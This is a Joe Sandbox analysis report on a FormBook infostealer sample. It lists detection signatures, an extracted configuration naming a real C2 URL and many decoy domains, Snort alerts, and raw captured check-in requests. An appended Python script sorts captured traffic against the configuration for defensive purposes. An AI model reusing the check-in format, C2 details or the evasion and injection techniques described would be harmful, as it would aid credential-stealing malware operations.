Analysis Report 08917506_by_Libranalysis

Overview

General Information

Sample Name: 08917506_by_Libranalysis (renamed file extension from none to exe)
Analysis ID: 403903
MD5: 089175069d5c095f078b7f8a3b28a22d
SHA1: a563615dfe562e7a11c2b7f21dcfcd412594eeee
SHA256: 173797a7a7a881f3d6230015620bae28d21b4b41b7e568c2a881b3c0829dd67e
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.evrbrite.com/o86d/"], "decoy": ["marielivet.com", "shadowlovely.com", "novfarm.com", "genialnetero.com", "nj-yanhua.com", "thaihuay88.com", "iizponja.com", "stark-stg.net", "nueforma.com", "fincheckxu.com", "joycasino-2020.club", "9thwrld.com", "komofood.com", "weekendcost.com", "marczeimet.com", "santequebec.info", "arpinaindustriesllc.com", "soyakmuzayede.com", "trivesse.online", "shonanwakukengyou.com", "whatisleanmanagement.com", "9icem.com", "blueberry-intl.com", "mylifequotenow.com", "octafxmate.com", "garnogroup.com", "saurara.com", "mydreamtv.net", "1fhewm.com", "agungproduk.com", "be7tv.com", "ohyescart.com", "sherylabrahamphotography.com", "oxfordfinancialadvising.com", "xn--80aaf2ckffc3a.xn--p1acf", "firstcoastelope.com", "novaquitaine-solidaire.com", "morumi.site", "lr-tn.com", "avondalevotes.com", "saranaturals.net", "thebraidedbreadcompany.com", "recruit-japan-hcm.com", "innovate.works", "changfangxinxi.com", "ckitco.com", "lacommusic.net", "cibass.com", "cafeciberseguridad.com", "fittogo.net", "franciszekmanteau.com", "liquidmarin.com", "toky5555.xyz", "bloomberg.sucks", "bluejay.ventures", "valleywomanforwoman.com", "helmutbuntjer.com", "870830.com", "xmrxapp.com", "lashicorn.com", "visionsbarbershop.com", "cinmax.xyz", "website-bazar.com", "zenseotools.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\OfCxSfBf.exe ReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted file
Source: 08917506_by_Libranalysis.exe Virustotal: Detection: 23%
Source: 08917506_by_Libranalysis.exe ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\OfCxSfBf.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 08917506_by_Libranalysis.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: 08917506_by_Libranalysis.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: 08917506_by_Libranalysis.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb source: 08917506_by_Libranalysis.exe, 00000005.00000002.295591762.0000000003150000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL source: 08917506_by_Libranalysis.exe, 00000005.00000002.295591762.0000000003150000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: 08917506_by_Libranalysis.exe, 00000005.00000002.295139182.0000000001550000.00000040.00000001.sdmp, ipconfig.exe, 0000000F.00000002.495544603.0000000000D30000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 08917506_by_Libranalysis.exe, ipconfig.exe
Source: Binary string: mscorrc.pdb source: 08917506_by_Libranalysis.exe, 00000000.00000002.260684849.0000000009280000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 4x nop then mov esp, ebp 0_2_05818E80
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 4x nop then mov esp, ebp 0_2_05818E73

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 67.222.39.83:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 67.222.39.83:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 67.222.39.83:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 206.189.46.186:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 206.189.46.186:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 206.189.46.186:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49749 -> 192.0.78.24:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49749 -> 192.0.78.24:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49749 -> 192.0.78.24:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 162.0.232.119:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 162.0.232.119:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 162.0.232.119:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.evrbrite.com/o86d/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.cinmax.xyz
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=FLq1m09lMNVeUGxb2EGlpEcYOBglVjP6VclDGdRBVwR1mwk4Bp+oxJyzVgRWjmk7leVMWGvpeQ==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.cinmax.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=ciPSY9IHIiBMUeM+AHa6rnkVhX0NcoOlsc17DR+fEw9UxF+XyC1njkrt1st9cFa0q3XsiD0AOg==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.genialnetero.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=sTrQNZETbqohgMY0G3QDWOyfMZqAyHA57kuO1l/GbTBT7+5tNjLfMqbR0u4OJ3a+5b59BonIRA==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.joycasino-2020.club | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=PL9u7p4v7hn5T83wCAG42BUGAPPNW4v8+s1TFKrmIVkrOUDjB/r4wvcv+gOAAG+Oa4qYtq3B7Q==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.marielivet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=LOco70LpFY5umcR4dQY6Ck5isx6bsPxuRuPfG/JQuVwPWdFiKckkP6tLRm3hZqsbjizE9R3VWg==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.firstcoastelope.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=lH+NNz2eaU5LSk/yemMXIWDwl3fMAuCKISb0DcDmH6anXfUVh7p155egYD4l1a4C4v8/cW+zhg==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.blueberry-intl.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=Zr1mHD0UzvWCQcI2JlGAeokzkFEIblHMxqeZtw3W9dCQQ7exnTCb8lR/2qgknbIFYyB/eFrcFw==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.thaihuay88.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k+L08OvZwr0NYVY1MAp4q6WCjDapjCg57Vf4Q==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.website-bazar.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4HvmT9bEqgnu31MbrCbNdKakV5eJA==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.sherylabrahamphotography.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.0.78.24
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Joe Sandbox View ASN Name: AUTOMATTICUS
Source: unknown DNS traffic detected: queries for: www.cinmax.xyz
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 04 May 2021 12:07:24 GMT | Server: Apache/2.4.29 (Ubuntu) | Content-Length: 328 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 38 36 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /o86d/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
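An added example (not part of the Joe Sandbox report) that triages the captured requests above against the extracted configuration. It parses each raw request, checks it for the check-in URI shape visible in the traffic (a short campaign directory such as /o86d/, one long base64-style value followed by one short one, no User-Agent), and labels the Host as the configured C2, a configured decoy, or unknown. The configuration values and the first two requests are copied from the report; the request to www.evrbrite.com and the browser request are constructed for contrast, the decoy list is trimmed to the hosts that appear in the captured traffic, and the function names and the URI heuristic are this example's own.

```python
"""Triage captured HTTP requests against an extracted FormBook configuration.

Added example; it is not part of the Joe Sandbox report. The C2 entry, the
decoy domains and the first two request lines are copied from the report
above; the request to the configured C2 and the benign request are
constructed for contrast, and the URI-shape heuristic is this example's own.
"""
import re
from urllib.parse import urlsplit

# Configuration as printed by the report's extractor (decoy list trimmed to the
# domains that also appear in the captured traffic).
FORMBOOK_CONFIG = {
    "C2 list": ["www.evrbrite.com/o86d/"],
    "decoy": ["marielivet.com", "genialnetero.com", "thaihuay88.com",
              "joycasino-2020.club", "blueberry-intl.com", "firstcoastelope.com",
              "sherylabrahamphotography.com", "website-bazar.com", "cinmax.xyz"],
}

# Constructed sample input: the first two requests are verbatim from the report,
# the third is what a check-in to the configured C2 would look like (not
# observed in the report), the fourth is an ordinary browser request.
SAMPLE_REQUESTS = [
    "GET /o86d/?W6jDfD=FLq1m09lMNVeUGxb2EGlpEcYOBglVjP6VclDGdRBVwR1mwk4Bp+oxJyzVgRWjmk7leVMWGvpeQ==&Yn=ybdHh8KP02GTtb HTTP/1.1\r\n"
    "Host: www.cinmax.xyz\r\nConnection: close\r\n\r\n",
    "GET /o86d/?W6jDfD=PL9u7p4v7hn5T83wCAG42BUGAPPNW4v8+s1TFKrmIVkrOUDjB/r4wvcv+gOAAG+Oa4qYtq3B7Q==&Yn=ybdHh8KP02GTtb HTTP/1.1\r\n"
    "Host: www.marielivet.com\r\nConnection: close\r\n\r\n",
    "GET /o86d/?W6jDfD=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&Yn=ybdHh8KP02GTtb HTTP/1.1\r\n"
    "Host: www.evrbrite.com\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]

BLOB_RE = re.compile(r"[A-Za-z0-9+/=]+")    # base64 alphabet used by the query values
PATH_RE = re.compile(r"/[A-Za-z0-9]{2,8}/")  # short campaign directory, e.g. /o86d/


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers with lowercase keys)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def split_query(query):
    """Split a query string without percent or plus decoding (the blob contains '+' and '/')."""
    return [tuple(part.partition("=")[::2]) for part in query.split("&") if part]


def classify(raw, config=FORMBOOK_CONFIG):
    method, target, headers = parse_request(raw)
    url = urlsplit(target)
    params = split_query(url.query)
    host = headers.get("host", "").lower()

    c2_hosts = {entry.split("/", 1)[0] for entry in config["C2 list"]}
    c2_paths = {"/" + entry.split("/", 1)[1] for entry in config["C2 list"] if "/" in entry}
    decoy_hosts = set(config["decoy"]) | {"www." + d for d in config["decoy"]}

    shape_ok = (
        method == "GET"
        and PATH_RE.fullmatch(url.path) is not None
        and len(params) == 2
        and all(BLOB_RE.fullmatch(value) for _, value in params)
        and len(params[0][1]) >= 40          # first value carries the encoded check-in payload
    )
    return {
        "host": host,
        "checkin_shape": shape_ok,
        "config_path": url.path in c2_paths,
        "no_user_agent": "user-agent" not in headers,
        "role": "c2" if host in c2_hosts else "decoy" if host in decoy_hosts else "unknown",
    }


def verdict(raw, config=FORMBOOK_CONFIG):
    """'formbook-checkin:<role>' when the request has the bot's URI shape, the
    configured path and no User-Agent; 'no-match' otherwise."""
    r = classify(raw, config)
    if r["checkin_shape"] and r["config_path"] and r["no_user_agent"]:
        return f"formbook-checkin:{r['role']}"
    return "no-match"


def triage(requests, config=FORMBOOK_CONFIG):
    """Map each request's Host to its verdict; the real C2 is the only 'c2' entry."""
    return {classify(r, config)["host"]: verdict(r, config) for r in requests}


if __name__ == "__main__":
    for host, result in triage(SAMPLE_REQUESTS).items():
        print(f"{host:35} {result}")
```

The point of the role field: the /o86d/ path and the two-parameter query are shared by the real C2 and every decoy, so a URI signature (the ET rules listed above fire on exactly this shape) alerts on decoy traffic as well, and the captured requests in this report all went to decoys. Only the extracted configuration separates www.evrbrite.com from the rest; the decoy hosts are typically unrelated domains and should be recorded as "contacted as decoy", not added to blocklists as C2 infrastructure. The 404 response above is what a decoy host usually returns for the campaign path.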
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000000.272184398.0000000006840000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230294482.0000000005BC1000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comde
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: 08917506_by_Libranalysis.exe String found in binary or memory: http://www.churchsw.org/church-projector-project
Source: 08917506_by_Libranalysis.exe String found in binary or memory: http://www.churchsw.org/repository/Bibles/
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253501338.0000000005BB0000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comaa
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253501338.0000000005BB0000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comceco
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.229924216.0000000005BC8000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.249681781.0000000001AA7000.00000004.00000040.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmp
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230603893.0000000005BB9000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/2
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/;
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/H
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230603893.0000000005BB9000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/M
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/W
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0r:
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/_
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/a
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/)
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/2
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/M
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/p
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/s
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/x
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230287588.0000000005BCB000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comic
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230287588.0000000005BCB000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comlic
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230081674.0000000005BC4000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cna
